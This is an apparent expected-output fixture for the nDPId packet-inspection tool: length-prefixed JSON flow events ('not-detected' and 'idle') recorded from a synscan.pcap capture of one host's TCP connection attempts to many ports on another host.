+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 